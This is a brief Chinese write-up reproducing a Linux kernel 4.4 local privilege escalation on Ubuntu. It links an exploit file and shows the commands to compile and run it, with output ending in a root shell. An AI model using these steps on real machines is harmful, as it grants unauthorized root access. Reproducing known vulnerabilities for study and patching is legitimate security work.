该漏洞在老版本中被修复了,但新的版本还存在漏洞
影响范围:Linux Kernel Version 4.14-4.4,Ubuntu/Debian发行版本
Exp下载地址:http://cyseclabs.com/exploits/upstream44.c
测试环境
sch01ar@ubuntu:~$ uname -a Linux ubuntu 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
开始测试
sch01ar@ubuntu:~$ gcc -o test upstream44.c sch01ar@ubuntu:~$ chmod -R 777 test sch01ar@ubuntu:~$ ./test task_struct = ffff8800338cd400 uidptr = ffff880007530904 spawning root shell root@ubuntu:~# whoami root
复现成功
